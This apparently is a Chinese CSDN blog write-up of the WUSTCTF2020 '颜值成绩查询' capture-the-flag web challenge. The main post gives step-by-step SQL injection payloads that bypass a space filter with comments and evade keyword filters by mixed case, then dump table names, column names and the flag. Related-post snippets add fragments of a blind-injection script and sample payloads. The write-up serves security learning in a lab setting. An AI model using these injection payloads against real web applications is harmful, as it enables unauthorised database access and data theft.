[WUSTCTF2020]颜值成绩查询WP

已于 2023-08-08 11:20:20 修改
阅读量1k 收藏
点赞数 5
文章标签: web安全 sql
于 2022-08-25 10:01:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61355725/article/details/126518079
版权

通过手工注入来绕过过滤 爆出答案 数字型注入

尝试万能密码 猜测存在过滤

尝试看看能不能绕过  发现过滤了空格

?stunum=1/**/order/**/by/**/3#  存在三个字段

?stunum=1/**/union/**/select/**/1,2,3# 发现还有其他过滤 尝试大小写或者双写等绕过

成了 依次测试union 和select 大小写 成功绕过

?stunum=-1/**/UNion/**/Select/**/1,2,3#

下面就容易了 正常注入过程

 ?stunum=-1/**/UNion/**/Select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()# 爆表名

 ?stunum=-1/**/UNion/**/Select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'# 爆字段名

?stunum=-1/**/UNion/**/Select/**/1,value,flag/**/from/**/flag#    #flag藏在了value里

 得flag

X1a0N@nFe1
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
[WUSTCTF2020]颜值成绩查询(布尔注入)
记录学习,一起进步
01-27 751
[WUSTCTF2020]颜值成绩查询(布尔注入)
[WUSTCTF2020]颜值成绩查询 布尔注入二分法
m0_64180167的博客
09-26 162
正确回显 100 错误 显示 not。发现回显了 我们可以开始编写脚本跑了。这道题很简单 就是sql注入。我们来学习一下如何写盲注脚本。接下来就是爆破表和字段了。我们使用二分法来写一遍。这里很显然就是盲注了。回显了 就拿这个去咯。
BUUCTF:[WUSTCTF2020]颜值成绩查询
末初的CSDN博客
04-07 1518
SQL盲注 2^if(ascii(mid(database(),1,1))>0,0,1); 先fuzz测试查看有没有过滤了什么,这里过滤了空格,但是我们可以收用/**/来分隔sql语句 先看我根据我的一篇文章布尔型盲注python脚本(功能超级完整)改的脚本 import requests def ascii_str(): # 生成库名表名字符所在的字符列表字典 str_li...
BUUCTF WEB 颜值成绩查询
qq_41696858的博客
03-01 250
一个查询窗口,很直观的感受是SQL注入,本着这个思路,测试0,1,2,3,4,5 发现0和5都是doesn’t exists,这里就可以利用布尔盲注来进行0,1的判断,下面就是过滤字的判断 由于只是布尔判断,所以没有办法判断是单引号闭合还是双引号闭合,or和and也不能判断出来,空格被过滤了是在后面爆表名的时候判断出来的 在尝试1^1的时候发现回显doesn’t exists,那么这个payload就是没问题的,下面就是判断过程了 1^if(length(database())>0,1,0)回显doe
buuctf-[WUSTCTF2020]颜值成绩查询
2202_75317918的博客
10-01 453
当输入的学号不存在时,只会返回“student number not exists.”。猜测是盲注题,因为看不见其他的回显信息,初步想法是构造值为1或0的表达式来进行探测。发现功能就是输入一个学号,然后返回对应的成绩,就是一个简单的查询操作。如果不采用二分法,会跑的很慢。打开环境,随便输个1看看。
[WUSTCTF2020]颜值成绩查询 -wp
freerats的博客
08-05 574
改变参数stunum发现页面会发生变化。 通过尝试可知参数处有boolean盲注,0^1会出现1的内容,因此判断具有盲注。 写脚本跑一下: import requests url='http://57e002cb-19bd-4ceb-bc2a-6960ff6347ac.node3.buuoj.cn/index.php' flag='' for i in range(50): a = 32 b = 128 mid = (a+b)//2 while(a<b): .
[WUSTCTF2020]颜值成绩查询
Mrs_H的博客
10-17 582
前言 最近一直在重新系统性的返回去学sql注入,题也做了一些,但是大部分题目都是靠着师傅们的wp做完的,实在是让我有点尴尬。但是这道题就不一样了,比较简单,简单到我自己一个人也能完成的程度。其实以前是学过sql注入的,但是总是在比赛上打不动大比赛sql注入的题目,这次返回学习也算是一个查漏补缺吧。 正文 首先进入环境可以看到下面这个页面。 是一个查询页面,上面的stunum是一个可变参数。最多可以变化到4. 简单的注入尝试一下 额。。。没什么效果,感觉后面的查询参数根本就没传进去。 尝试了报错注入,但
re学习笔记(56)WUSTCTF – Re方向WP
12-21
得到flag为wctf2020{cpp_@nd_r3verse_@re_fun} WUSTCTF-re-level1 下载下来压缩包有两个文件,一个是ELF64位,一个是output.txt是程序的输出 IDA64位载入查看main函数 对19位的flag变换后输出,, 写脚本 #include ...
2020 第二届网鼎杯 boom wp
01-20
2020 第二届网鼎杯 boom wp ​ ​ 卑微新手在线答题。。。。。 第二届网鼎杯-boom 下载附件得到一个boom.exe程序 打开是这样 根据提示继续 得到一串md5 加密的数据,使用在线解密 https://www.somd5.com/ 得到第...
wp7 天气预报查询
05-10
wp7 天气预报查询 天气实时信息读取的是google的API数据
WP7手机归属地查询源码2012429
04-29
WP7手机归属地查询源码 功能描述: 本程序在网络畅通的情况下能方便的查询出手机号码的归属地来自51ASPX! 注意事项: 1)安装wp7开发环境7.1 2)确保网络畅通
WP7查询IP所在地
08-04
WP7查询IP所在地
2024中国网络安全产品用户调查报告(发布版)
2301_76786857的博客
06-12 702
本报告正是安在新媒体发起,基于“诸子云社群,以“取之于民,用之于民"的方式,反馈“甲方"眼中的中国网络安全市场情况,为网络安全行业提供来自网络安全企业用户视角的参考。自2020年始,人类进入了21世纪的第二个十年,全球进入了百年未有之大变局,新十年的开始即被新冠疫情逆转了全球化发展的历程,而至2022年3月俄乌战争又突然爆发,紧接着2023年7月“巴以冲突"皱起,世界快速进入动荡中,不确定性激增,网络对抗愈演愈烈,导致中国网络安全市场和环境受到重大影响。
网络安全实战:剖析ThinkPHP 5.1.X反序列化漏洞
weixin_43822401的博客
06-16 413
ThinkPHP作为广泛使用的PHP开发框架,在5.1.X版本中存在一个严重的反序列化漏洞。该漏洞允许攻击者通过构造特定的序列化字符串,实现在服务器上执行任意代码,从而可能导致数据泄露、服务中断等安全事件。
【网络安全的神秘世界】AppScan安装及使用指南
最新发布
weixin_54750312的博客
06-16 225
动态的web扫描,爬取目标网站的接口、链接,通过扫描器自身的扫描逻辑去发送一些特定的http请求数据包,根据服务端的返回内容来判断存在哪些漏洞。AppScan是一种综合型漏洞扫描工具,采用SaaS解决方案,它将所以测试功能整合到一个服务中,避免了因操作系统不同带来的安装问题。ASoC使用安装在应用程序上的代理,通过监控所有的交互流量,在应用程序运行期间识别安全漏洞。checkmark:非编译扫描,代码是什么样它就什么样。fortify:编译扫描,需要一定的环境依赖。动态分析(DAST)——黑盒扫描。
网络安全(补充)
m0_62207482的博客
06-16 506
网络蠕虫是一种具有自我复制和传播能力、可独立自动运行的恶意程序,属于主动传播。属于被动传播的有计算机病毒、特洛伊木马、逻辑炸弹、细菌、恶意脚本、恶意Active X控件、间谍软件等 文件型病毒系计算机病毒德意志,主要通过感染计算机中的可执行文件(.exe)和命令文件(.com)。把所有通过操作系统的文件系统进行感染的病毒都称作文件病毒。可以感染所有标准的DOS可执行文件:包括批处理文件、DOS下的可加载驱动程序(.SYS)文件以及普通的COM/EXE可执行文件。由于HTML文件无法嵌入二进制执行代码,且是
web安全渗透测试十大常规项(一):web渗透测试之文件包含漏洞
HACKONE的博客
06-16 33
参考:https://blog.csdn.net/unexpectedthing/article/details/121276653。url编码2次:php://filter/write=convert.base64-decode/resource=123.php。url编码2次:php://filter/write=string.rot13/resource=2.php。URL中有path、dir、file、pag、page、archive、p、eng、语言文件等相关字眼。
羊城杯2020 wp
08-18
羊城杯2020是一场年度的电子竞技赛事,为广大电竞爱好者提供了一个展示技术和激发激情的舞台。今年的羊城杯聚集了来自全国各地的顶尖电竞选手,他们在各个游戏项目中展现了高水平的操作和战术。 在比赛的文化氛围...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

X1a0N@nFe1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值